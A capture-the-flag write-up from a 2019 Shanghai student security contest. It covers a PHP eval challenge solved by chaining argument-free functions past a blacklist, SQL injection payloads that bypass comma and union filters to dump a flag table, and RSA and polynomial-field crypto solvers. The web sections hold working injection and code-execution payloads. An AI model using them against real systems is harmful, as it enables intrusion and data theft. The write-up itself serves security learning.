2019 Shanghai College Student Network Security Competition

Web

Decade

Challenge source code

<?php
highlight_file(__FILE__);
$code = $_GET['code'];
if (!empty($code)) {
    if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
        if (preg_match('/readfile|if|time|local|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
            echo 'bye~';
        } else {
            eval($code);
        }
    }
    else {
        echo "No way!!!";
    }
}else {
    echo "No way!!!";
}

This challenge is much like the ByteDance one, but with somewhat more restrictions, so I am recording it here.

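The regular expression /[a-z]+\((?R)?\)/ accepts only calls to functions without arguments whose names consist solely of lowercase letters, although calls may be nested inside one another. If only ; is left after the replacement, the input passes this check.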

The second regular expression bans a long list of functions. So which functions can still be used? Let's fuzz:

<?php
// Enumerate PHP's built-in functions and keep those that survive the blacklist
$funcs = get_defined_functions()['internal'];
$len = count($funcs);
$i_need_func = array();
$j = 0;
for ($i = 0; $i < $len; $i++){
    if (!preg_match('/readfile|if|time|local|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $funcs[$i])){
        // Skip names in which strpos finds an underscore; [a-z]+ cannot match those
        if (!strpos($funcs[$i],'_')){
            $i_need_func[$j] = $funcs[$i];
            $j++;
        }
    }
}

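This leaves 307 usable functions. From the challenge we know the flag is in the parent directory, so chdir is needed to move there. But chdir only returns a bool, so we need a function that accepts a boolean and can produce ".".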

First, consider how to read a file in the current directory.

PHP's file-reading functions are:

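fgetc — reads a character from a file pointer
fgets — reads a line from a file pointer
fgetss — reads a line from a file pointer and strips HTML tags
file_get_contents — reads an entire file into a string
file — reads an entire file into an array
fopen — opens a file or URL
fread — reads from a file (binary-safe)
readfile — outputs a file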

PHP's directory-handling functions are:

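basename( )  // returns the file name component of a path
chdir() // changes the current directory
dirname( ) // returns the directory component of a path
getcwd() // returns the current working directory
pathinfo( ) // returns information about a file path
opendir( ) // opens a directory handle
readdir( ) // reads an entry from a directory handle, returning the name of the next file in the directory
rewinddir( ) // rewinds a directory handle
closedir( ) // closes a directory handle
mkdir( ) // creates a directory
rmdir( ) // removes the given empty directory
scandir( ) // lists the files and directories inside the given path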

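Here we choose scandir. So how do we get "."? The ASCII code of . is 46, so chr(46) yields ., which denotes the current directory. The next question is how to obtain 46.

Fuzz for functions that return a value without needing any arguments: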

import requests

funcs = "strcmp,strncmp,strcasecmp,strncasecmp,each,define,defined,date,idate,gmdate,checkdate,readgzfile,gzrewind,gzclose,gzeof,gzread,gzopen,gzpassthru,gzseek,gztell,gzwrite,gzputs,gzfile,gzcompress,gzuncompress,gzdeflate,gzinflate,gzencode,bcadd,bcsub,bcmul,bcdiv,bcmod,bcpow,bcscale,bccomp,bcpowmod,bzopen,bzread,bzwrite,bzflush,bzclose,bzerrno,bzerrstr,bzerror,bzcompress,jdtogregorian,jdtojulian,jdtojewish,jewishtojd,jdtofrench,frenchtojd,jddayofweek,unixtojd,jdtounix,imagearc,imageellipse,imagechar,imagecharup,imagecolorat,imagecolorallocate,imagecreatefromstring,imagecolorclosest,imagecolorclosesthwb,imagecolordeallocate,imagecolorresolve,imagecolorexact,imagecolorstotal,imagecolorsforindex,imagecopy,imagecopymerge,imagecopymergegray,imagecopyresized,imagecreate,imageistruecolor,imagefilledarc,imagefilledellipse,imagealphablending,imagesavealpha,imagecolorallocatealpha,imagecolorresolvealpha,imagecolorclosestalpha,imagecolorexactalpha,imagecopyresampled,imagerotate,imageflip,imagecrop,imagecropauto,imagescale,imageaffine,imageaffinematrixconcat,imagecreatefrompng,imagecreatefromjpeg,imagecreatefromwbmp,imagecreatefromxbm,imagecreatefromgd,imagecreatefromgd2,imagecreatefromgd2part,imagepng,imagejpeg,imagewbmp,imagegd,imagegd2,imagedestroy,imagegammacorrect,imagefill,imagefilledpolygon,imagefilledrectangle,imagefilltoborder,imageline,imagepolygon,imagerectangle,imagestring,imagestringup,imagesx,imagesy,imagedashedline,jpeg2wbmp,png2wbmp,image2wbmp,imagelayereffect,imagexbm,imagecolormatch,imagefilter,imageconvolution,hash,iconv,mbereg,mberegi,mbsplit,snmpwalk,snmprealwalk,snmpwalkoid,sleep,usleep,flush,wordwrap,htmlspecialchars,sha1,md5,crc32,iptcparse,iptcembed,phpversion,phpcredits,strspn,strcspn,strtok,strtoupper,strtolower,strpos,stripos,strrpos,strripos,strrev,hebrev,hebrevc,nl2br,stripslashes,stripcslashes,strstr,stristr,strrchr,strpbrk,strcoll,substr,ucfirst,lcfirst,ucwords,strtr,addslashes,addcslashes,rtrim,trim,ltrim,implode,join,soundex,levenshtein,chr,ord,chop,strchr,sscanf,fscanf,urlencode,rawurlencode,readlink,symlink,link,unlink,exec,system,escapeshellcmd,escapeshellarg,passthru,abs,ceil,floor,round,sin,cos,tan,asin,acos,atan,atanh,atan2,sinh,cosh,tanh,asinh,acosh,pow,hypot,deg2rad,rad2deg,fmod,ip2long,long2ip,putenv,uniqid,serialize,unserialize,header,checkdnsrr,floatval,doubleval,strval,boolval,pclose,popen,rewind,rmdir,umask,fclose,feof,fread,fopen,fpassthru,ftruncate,fstat,fseek,ftell,fflush,fwrite,fputs,mkdir,copy,tmpfile,file,fputcsv,flock,fnmatch,fsockopen,pfsockopen,pack,unpack,crypt,opendir,closedir,chdir,rewinddir,readdir,dir,scandir,glob,filegroup,fileinode,fileowner,fileperms,filesize,stat,lstat,chown,chgrp,lchown,lchgrp,chmod,touch,clearstatcache,diskfreespace,mail,ksort,krsort,asort,arsort,sort,rsort,usort,uasort,uksort,shuffle,end,prev,next,key,min,max,extract,compact,range,pos,sizeof,assert,ftok,virtual"
func = funcs.split(',')
url = "http://localhost/code/code/code.php?code=%s"
for i in func:
    # Call each function with no arguments and echo whatever it returns
    test = "echo(%s());" % i
    res = requests.get(url % test)
    body = res.text
    if "Warning" in body:
        pass
    elif "No way!!!" in body:
        pass
    elif "<" in body:
        pass
    elif len(body) == 0:
        pass
    else:
        print(i + ": " + body)

This gives:

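phpcredits — prints the list of PHP contributors
unixtojd: — converts a Unix timestamp to a Julian Day count
phpversion: — returns the current PHP version
uniqid: — generates a unique ID based on the current time in microseconds
umask: — returns the current umask
tmpfile: — creates a temporary file with a unique name in read-write (w+) mode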

Fuzz for functions that need only one argument:

import requests

funcs = "strcmp,strncmp,strcasecmp,strncasecmp,each,define,defined,date,idate,gmdate,checkdate,readgzfile,gzrewind,gzclose,gzeof,gzread,gzopen,gzpassthru,gzseek,gztell,gzwrite,gzputs,gzfile,gzcompress,gzuncompress,gzdeflate,gzinflate,gzencode,bcadd,bcsub,bcmul,bcdiv,bcmod,bcpow,bcscale,bccomp,bcpowmod,bzopen,bzread,bzwrite,bzflush,bzclose,bzerrno,bzerrstr,bzerror,bzcompress,jdtogregorian,jdtojulian,jdtojewish,jewishtojd,jdtofrench,frenchtojd,jddayofweek,unixtojd,jdtounix,imagearc,imageellipse,imagechar,imagecharup,imagecolorat,imagecolorallocate,imagecreatefromstring,imagecolorclosest,imagecolorclosesthwb,imagecolordeallocate,imagecolorresolve,imagecolorexact,imagecolorstotal,imagecolorsforindex,imagecopy,imagecopymerge,imagecopymergegray,imagecopyresized,imagecreate,imageistruecolor,imagefilledarc,imagefilledellipse,imagealphablending,imagesavealpha,imagecolorallocatealpha,imagecolorresolvealpha,imagecolorclosestalpha,imagecolorexactalpha,imagecopyresampled,imagerotate,imageflip,imagecrop,imagecropauto,imagescale,imageaffine,imageaffinematrixconcat,imagecreatefrompng,imagecreatefromjpeg,imagecreatefromwbmp,imagecreatefromxbm,imagecreatefromgd,imagecreatefromgd2,imagecreatefromgd2part,imagepng,imagejpeg,imagewbmp,imagegd,imagegd2,imagedestroy,imagegammacorrect,imagefill,imagefilledpolygon,imagefilledrectangle,imagefilltoborder,imageline,imagepolygon,imagerectangle,imagestring,imagestringup,imagesx,imagesy,imagedashedline,jpeg2wbmp,png2wbmp,image2wbmp,imagelayereffect,imagexbm,imagecolormatch,imagefilter,imageconvolution,hash,iconv,mbereg,mberegi,mbsplit,snmpwalk,snmprealwalk,snmpwalkoid,sleep,usleep,flush,wordwrap,htmlspecialchars,sha1,md5,crc32,iptcparse,iptcembed,phpversion,phpcredits,strspn,strcspn,strtok,strtoupper,strtolower,strpos,stripos,strrpos,strripos,strrev,hebrev,hebrevc,nl2br,stripslashes,stripcslashes,strstr,stristr,strrchr,strpbrk,strcoll,substr,ucfirst,lcfirst,ucwords,strtr,addslashes,addcslashes,rtrim,trim,ltrim,implode,join,soundex,levenshtein,chr,ord,chop,strchr,sscanf,fscanf,urlencode,rawurlencode,readlink,symlink,link,unlink,exec,system,escapeshellcmd,escapeshellarg,passthru,abs,ceil,floor,round,sin,cos,tan,asin,acos,atan,atanh,atan2,sinh,cosh,tanh,asinh,acosh,pow,hypot,deg2rad,rad2deg,fmod,ip2long,long2ip,putenv,uniqid,serialize,unserialize,header,checkdnsrr,floatval,doubleval,strval,boolval,pclose,popen,rewind,rmdir,umask,fclose,feof,fread,fopen,fpassthru,ftruncate,fstat,fseek,ftell,fflush,fwrite,fputs,mkdir,copy,tmpfile,file,fputcsv,flock,fnmatch,fsockopen,pfsockopen,pack,unpack,crypt,opendir,closedir,chdir,rewinddir,readdir,dir,scandir,glob,filegroup,fileinode,fileowner,fileperms,filesize,stat,lstat,chown,chgrp,lchown,lchgrp,chmod,touch,clearstatcache,diskfreespace,mail,ksort,krsort,asort,arsort,sort,rsort,usort,uasort,uksort,shuffle,end,prev,next,key,min,max,extract,compact,range,pos,sizeof,assert,ftok,virtual"
func = funcs.split(',')
url = "http://localhost/code/code/code.php?code=%s"
arr = []
for i in func:
    # Call with no arguments; PHP's warning text reveals how many arguments are expected
    test = "echo(%s());" % i
    res = requests.get(url % test)
    if "1 parameter" in res.text:
        arr.append(i)
print(arr)

This gives:

['each', 'defined', 'date', 'idate', 'gmdate', 'readgzfile', 'gzrewind', 'gzclose', 'gzeof', 'gzpassthru', 'gztell', 'gzfile', 'gzcompress', 'gzuncompress', 'gzdeflate', 'gzinflate', 'gzencode', 'bcscale', 'bzread', 'bzflush', 'bzclose', 'bzerrno', 'bzerrstr', 'bzerror', 'bzcompress', 'jdtogregorian', 'jdtojulian', 'jdtojewish', 'jdtofrench', 'jddayofweek', 'jdtounix', 'imagecreatefromstring', 'imagecolorstotal', 'imageistruecolor', 'imagecropauto', 'imagecreatefrompng', 'imagecreatefromjpeg', 'imagecreatefromwbmp', 'imagecreatefromxbm', 'imagecreatefromgd', 'imagepng', 'imagejpeg', 'imagewbmp', 'imagegd', 'imagedestroy', 'imagesx', 'imagesy', 'sleep', 'usleep', 'wordwrap', 'htmlspecialchars', 'iptcparse', 'strtok', 'strtoupper', 'strtolower', 'strrev', 'hebrev', 'hebrevc', 'stripslashes', 'stripcslashes', 'ucfirst', 'lcfirst', 'ucwords', 'addslashes', 'rtrim', 'trim', 'ltrim', 'implode', 'join', 'soundex', 'ord', 'chop', 'urlencode', 'rawurlencode', 'readlink', 'unlink', 'exec', 'system', 'escapeshellcmd', 'escapeshellarg', 'passthru', 'abs', 'ceil', 'floor', 'round', 'sin', 'cos', 'tan', 'asin', 'acos', 'atan', 'atanh', 'sinh', 'cosh', 'tanh', 'asinh', 'acosh', 'putenv', 'serialize', 'unserialize', 'header', 'checkdnsrr', 'floatval', 'doubleval', 'strval', 'boolval', 'pclose', 'rewind', 'rmdir', 'fclose', 'feof', 'fpassthru', 'fstat', 'ftell', 'fflush', 'mkdir', 'file', 'fsockopen', 'pfsockopen', 'pack', 'crypt', 'opendir', 'chdir', 'dir', 'scandir', 'glob', 'filegroup', 'fileinode', 'fileowner', 'fileperms', 'filesize', 'stat', 'lstat', 'touch', 'diskfreespace', 'ksort', 'krsort', 'asort', 'arsort', 'sort', 'rsort', 'shuffle', 'end', 'prev', 'next', 'key', 'min', 'max', 'extract', 'compact', 'pos', 'sizeof', 'assert', 'virtual']

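Through searching and testing, chr(ord(hebrevc(crypt(phpversion())))) and chr(ord(hebrevc(crypt(1)))) turn out to produce one of two results, . or $. After a few tries it is fairly easy to get ., so this method is used directly. Once . has been obtained, scandir followed by next yields "..".

PHP has a group of functions that operate on an array's internal pointer: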

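current() - returns the value of the current element of the array
pos() - returns the value of the current element of the array
next() - moves the internal pointer to the next element and returns it
prev() - moves the internal pointer to the previous element and returns it
reset() - moves the internal pointer to the first element and returns it
each() - returns the key and value of the current element and advances the internal pointer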


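Next, use chdir to move up to the parent directory. It returns 1 on success, so we repeat the first step to construct a dot, then scan the current directory, take the file name with end, read the whole file into an array with file, and use implode to get the file contents. Final payload: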

echo(implode(file(end(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion()))))))))))))))));
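To see how the payload relates to the two checks in the challenge source, the filter can be modelled offline in Python. This is an added example, not code from the original write-up: `match_call`, `strip_calls`, `verdict` and `nest` are hypothetical helper names, and the recursive pattern is emulated with a recursive-descent matcher because Python's `re` has no `(?R)`.

```python
import re

# Blacklist copied verbatim from the challenge's preg_match call.
BLACKLIST = re.compile(
    r"readfile|if|time|local|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log",
    re.IGNORECASE,
)

# Function chain of the final payload on this page, outermost call first.
CHAIN = ["echo", "implode", "file", "end", "scandir", "chr", "ord", "hebrevc",
         "crypt", "chdir", "next", "scandir", "chr", "ord", "hebrevc", "crypt",
         "phpversion"]


def match_call(code, pos):
    # Emulates one match of [a-z]+\((?R)?\) starting at pos.
    # Returns the index just past the match, or -1 if there is none.
    end = pos
    while end < len(code) and "a" <= code[end] <= "z":
        end += 1
    if end == pos or end >= len(code) or code[end] != "(":
        return -1
    end += 1
    inner = match_call(code, end)  # the optional nested call
    if inner != -1 and code[inner:inner + 1] == ")":
        return inner + 1
    return end + 1 if code[end:end + 1] == ")" else -1


def strip_calls(code):
    # Emulates preg_replace(pattern, NULL, code): delete matches, keep the rest.
    out, pos = [], 0
    while pos < len(code):
        end = match_call(code, pos)
        if end == -1:
            out.append(code[pos])
            pos += 1
        else:
            pos = end
    return "".join(out)


def verdict(code):
    # Same branch order as the PHP source.
    if not code or strip_calls(code) != ";":
        return "No way!!!"
    if BLACKLIST.search(code):
        return "bye~"
    return "eval"


def nest(names):
    # Builds f1(f2(...fn())); from a list of function names.
    return "(".join(names) + "(" + ")" * len(names) + ";"


if __name__ == "__main__":
    # Constructed probes, followed by the page's payload chain.
    for probe in ["scandir('.');", "getcwd();", "a(b()c());", nest(CHAIN)]:
        print(verdict(probe), "<-", probe)
```

A literal argument fails the structural check, `getcwd` is stopped by the `et` entry of the blacklist, and the nested chain reaches `eval`, which is why a substring blacklist in front of `eval` is not a usable control.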

For more detail, see: https://www.freebuf.com/column/221178.html

Babyt5

A challenge from the Anheng monthly contest

https://www.jianshu.com/p/804d95f6d6fb

easysql

Manual testing showed that the comma (,), and, or, and union select are filtered; union select can be bypassed with union all select.

The bypass follows this article:

https://drops.blbana.cc/2017/05/20/SQLi-%E2%80%94%E2%80%94-%E9%80%97%E5%8F%B7%EF%BC%8C%E7%A9%BA%E6%A0%BC%EF%BC%8C%E5%AD%97%E6%AE%B5%E5%90%8D%E8%BF%87%E6%BB%A4%E7%AA%81%E7%A0%B4/#0x01-%E6%B5%8B%E8%AF%95

database:cccttffff

?id=' union all select * from ((select 1)a join (select database())b join (select 3)c join (select 4)d)%23

Because information cannot be used, mysql.innodb_table_stats is used in place of information_schema.tables.

table:article,fl111aa44a99g

?id=' union all select * from ((select 1)a join (select database())b join (select 3)c join (select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())d)%23

Next comes the injection without column names to get the flag:

?id=' union all select * from ((select 1)a join (select F.3 from (select * from (select 1)u join (select 2)i join (select 3)o union all select * from fl111aa44a99g limit 1 offset 1)F)b join (select 3)c join (select 4)d)%23

Crypto

RSA

Compute p+q from the conditions given in the challenge:

n = 9538795663851271297602738029671089878718012242935213096566250130325046936720540247534143498025477544161347330379679111765871420732255741210434736423951962189227302658997497664520929375215715960063615792480965807127438948044298348300153102760490410578638259665656608784635088735809470916136628779400145983632930861883762707606629208260803446083579674497451514650309351925430391515629898218875049677870989016071086844819626778388370764400242376469343158294638240660190754978627356076115228410162956087266527271225439142347304100660800517276772407728290414074912243665126741030948775883739544952378188264714716087909797
s1 = 19077591327702542595205476059342179757436024485870426193132500260650093873441080495068286996050955088322694660759358223531742841464511482420869472847903924378454605317994995329041858750431431920127231584961931614254877896088596696600306205520980821157276519331313217569270177471618941832273257558800291967266057799408185825199394392306374394195697993019961311696247374832761757990150416392201444079060627610573918631913438062954960835929982836033906925917632413007648356037059843552967726871763559759125837289869091638924336309932526582201350695938677991368335828814565265478203873169858685929462350511138398905572292
s2 = 9538795663851271297602738029671089878718012242935213096566250130325046936720540247534143498025477544161347330379679111765871420732255741210434736423951962189227302658997497664520929375215715960063615792480965807127438948044298348300153102760490410578638259665656608784635088735809470916136628779400145983632930861883762707606629208260803446083579674497451514650309351925430391515629898218875049677870989016071086844819626778388370764400242376469343158294638240660190754978627356076115228410162956087266527271225439142347304100660800517276772407728290414074912243665126741030948775883739544952378188264714716087909797
print(s1 * n // s2 - 2 * n)

p+q

196075640660409986135975784767502028538644025058282395628670981900974958890619954451344723318649578431744942274184506178219307129498083095220609328355931687266846079805131400737270051437647584592782747418213354229728108610925547647805880482097163218511341484311783416306321402379596024705973981708966729752698

Solving the equations with z3 gives p and q:

from z3 import *
p = Int('p')
q = Int('q')
s = Solver()
s.add(p*q == 9538795663851271297602738029671089878718012242935213096566250130325046936720540247534143498025477544161347330379679111765871420732255741210434736423951962189227302658997497664520929375215715960063615792480965807127438948044298348300153102760490410578638259665656608784635088735809470916136628779400145983632930861883762707606629208260803446083579674497451514650309351925430391515629898218875049677870989016071086844819626778388370764400242376469343158294638240660190754978627356076115228410162956087266527271225439142347304100660800517276772407728290414074912243665126741030948775883739544952378188264714716087909797)
s.add(p+q == 196075640660409986135975784767502028538644025058282395628670981900974958890619954451344723318649578431744942274184506178219307129498083095220609328355931687266846079805131400737270051437647584592782747418213354229728108610925547647805880482097163218511341484311783416306321402379596024705973981708966729752698)
s.check()
model = s.model()
print(model)

p

89516168421901993249082527171566896585255089161654435795639393653714938085176717624166720396457043359717304975102306007578654871083121175803454922681698922194906414804214604517410856199189184886589639271288946105569496874593987805690922703821405554650664707364293232855974170175729835163792122422002418728851

q

106559472238507992886893257595935131953388935896627959833031588247260020805443236827178002922192535072027637299082200170640652258414961919417154405674232765071939665000916796219859195238458399706193108146924408124158611736331559842114957778275757663860676776947490183450347232203866189542181859286964311023847

Brute-force e using pow(123,e,n), which gives e=251:

import gmpy2
import binascii
p = 89516168421901993249082527171566896585255089161654435795639393653714938085176717624166720396457043359717304975102306007578654871083121175803454922681698922194906414804214604517410856199189184886589639271288946105569496874593987805690922703821405554650664707364293232855974170175729835163792122422002418728851
q = 106559472238507992886893257595935131953388935896627959833031588247260020805443236827178002922192535072027637299082200170640652258414961919417154405674232765071939665000916796219859195238458399706193108146924408124158611736331559842114957778275757663860676776947490183450347232203866189542181859286964311023847
c1 = 368284101618076523549199130884422355928051525996327977632544904437878504262870825378516827225793010165434494157238379685995430409966951122729243411694569562164062815098110639750101378457641471316188502263725098231679401928494160942213175404259256770984218593245458108598930926260386443799301699336309331946341173652201791293571029025818674575198311845811957606474490230382511996537893448524426809391980637983473305318819523408854264623254226127223862150173575206444726570183096891630129244778802793476295746913846105454198627
c = 7303495910407762399046490836902121070389476875516762048462433039234972742941586801378979220008051262826174054961747648114128456872349675769941760630519744351742977740846748646739901172672743584989842268056810152117350241337045055812845489372389014195433916347255846499434232234822333192328886207187844781726928951986353054876826105507064928478812402103648940709131760865763234071703554208057808885564381400571862422316195578258814602362582573148358552148686182480215663291366798585241933446701357953551496955627421526567152576426417189707335038601040167826900549139608192971559659991213411381604721734898065256138516
n = 9538795663851271297602738029671089878718012242935213096566250130325046936720540247534143498025477544161347330379679111765871420732255741210434736423951962189227302658997497664520929375215715960063615792480965807127438948044298348300153102760490410578638259665656608784635088735809470916136628779400145983632930861883762707606629208260803446083579674497451514650309351925430391515629898218875049677870989016071086844819626778388370764400242376469343158294638240660190754978627356076115228410162956087266527271225439142347304100660800517276772407728290414074912243665126741030948775883739544952378188264714716087909797
phi = (p-1)*(q-1)
e = 251
d = gmpy2.invert(e,phi)
flag = pow(c,d,n)
print (binascii.unhexlify(hex(flag)[2:]))
# for i in range(1,1000):
#     c2 = pow(123,i,n)
#     if c2 == c1:
#         print(i)
#         break
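Once p+q is known, a constraint solver is not required: p and q are the two roots of x^2 - (p+q)x + n = 0, so an integer square root of the discriminant recovers them. The Python 3 code below is an added example, not the write-up's own script; it swaps z3 for this closed form, uses small constructed primes in place of the challenge values, and its function names are hypothetical. It also carries out the exponent search and the decryption.

```python
from math import isqrt


def factor_from_sum(n, s):
    # p and q are the roots of x^2 - s*x + n = 0, where s = p + q.
    disc = s * s - 4 * n  # equals (p - q)^2 when s really is p + q
    if disc < 0:
        raise ValueError("s is too small to be p + q")
    root = isqrt(disc)
    if root * root != disc:
        raise ValueError("s is not p + q for this n")
    p, q = (s - root) // 2, (s + root) // 2
    assert p * q == n
    return p, q


def find_exponent(n, plain, cipher, limit=1000):
    # Known-plaintext search for a small public exponent,
    # the same idea as the pow(123, e, n) loop in the write-up.
    for e in range(1, limit):
        if pow(plain, e, n) == cipher:
            return e
    return None


def rsa_decrypt(c, e, p, q):
    # Requires Python 3.8+ for the modular inverse via pow(e, -1, phi).
    d = pow(e, -1, (p - 1) * (q - 1))
    return pow(c, d, p * q)


def demo():
    # Constructed values: two well-known primes and the e found on this page.
    p0, q0, e0 = 65537, 2147483647, 251
    n, s = p0 * q0, p0 + q0
    known = pow(123, e0, n)  # plays the role of c1
    c = pow(int.from_bytes(b"flag!", "big"), e0, n)  # plays the role of c

    p, q = factor_from_sum(n, s)
    e = find_exponent(n, 123, known)
    m = rsa_decrypt(c, e, p, q)
    return p, q, e, m.to_bytes(5, "big")


if __name__ == "__main__":
    print(demo())
```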

poly

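Recover k1 and k2 from a system of two linear equations over the polynomial field, then solve a single linear equation to obtain msg0 and msg1: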

import binascii
P=PolynomialRing(GF(2),'x')
F.<x> = GF(2)[]
pol = x**255+ x**143+ x**47 + x**3 + 1
FF = GF(2**256)
r1 = 0xbd94909c0e247c276ef6816797dd2b176337a430269f4f9df7ea14923a1a
r2 = 0xc1fef44fd4d870d00622e1f40779a2a83a64ab693c54780960b043d4d2ea
c1 = 0x0000bd94909c0e247c276ef6816797dd2b176337a430269f4f9df7ea14923a1a
c2 = 0x0000c1fef44fd4d870d00622e1f40779a2a83a64ab693c54780960b043d4d2ea
m1 = 0x0000476f6f6421546869735f69735f666c61673a666c61677b36303639636166
m2 = 0x0000362d303965312d343934612d626362352d6239346538663238383937317d
# get poly
c1 = P(FF.fetch_int(c1))
c2 = P(FF.fetch_int(c2))
r1 = P(FF.fetch_int(r1))
r2 = P(FF.fetch_int(r2))
m1 = P(FF.fetch_int(m1))
m2 = P(FF.fetch_int(m2))
# print c1
k1 = (c1-c2)*inverse_mod(r1-r2,pol)
k2 = c1-k1*r1
msg0 = (m1-k2)*inverse_mod(k1,pol)%pol
msg1 = (m2-k2)*inverse_mod(k1,pol)%pol
# get int
msg0 = FF(msg0).integer_representation()
msg1 = FF(msg1).integer_representation()
print msg0
print msg1
print binascii.a2b_hex(hex(msg0)[2:-1])
print binascii.a2b_hex(hex(msg1)[2:-1])
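The solver above relies on the affine relation c = k1*r + k2 over GF(2)[x] modulo a fixed polynomial: two known (r, c) pairs give k1 and k2, and each ciphertext is then inverted with one more linear equation. The Python 3 code below is an added example, not the write-up's Sage script; it assumes the 8-bit field with modulus x^8+x^4+x^3+x+1 and constructed keys so the values stay readable, and all function names are hypothetical.

```python
DEG = 8
MOD = 0x11B  # x^8 + x^4 + x^3 + x + 1, irreducible over GF(2) (constructed choice)


def gf_mul(a, b):
    # Carry-less multiplication of two polynomials, reduced modulo MOD.
    r = 0
    while b:
        if b & 1:
            r ^= a
        b >>= 1
        a <<= 1
        if a >> DEG:
            a ^= MOD
    return r


def gf_inv(a):
    # a^(2^DEG - 2) is the inverse of a in a field with 2^DEG elements.
    if a == 0:
        raise ZeroDivisionError("0 has no inverse")
    r, e = 1, (1 << DEG) - 2
    while e:
        if e & 1:
            r = gf_mul(r, a)
        a = gf_mul(a, a)
        e >>= 1
    return r


def affine_encrypt(x, k1, k2):
    # c = k1*x + k2; addition in GF(2)[x] is XOR.
    return gf_mul(k1, x) ^ k2


def recover_keys(r1, c1, r2, c2):
    # Subtracting the two equations removes k2: c1 - c2 = k1*(r1 - r2).
    k1 = gf_mul(c1 ^ c2, gf_inv(r1 ^ r2))
    k2 = c1 ^ gf_mul(k1, r1)
    return k1, k2


def affine_decrypt(c, k1, k2):
    # msg = (c - k2) / k1
    return gf_mul(c ^ k2, gf_inv(k1))


def demo():
    k1, k2 = 0x57, 0x83  # constructed secret keys
    r1, r2 = 0x01, 0x02  # constructed known inputs
    c1, c2 = affine_encrypt(r1, k1, k2), affine_encrypt(r2, k1, k2)
    secret = [affine_encrypt(b, k1, k2) for b in b"msg0"]

    g1, g2 = recover_keys(r1, c1, r2, c2)
    return g1, g2, bytes(affine_decrypt(c, g1, g2) for c in secret)


if __name__ == "__main__":
    print(demo())
```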

poly_rev

Same as poly.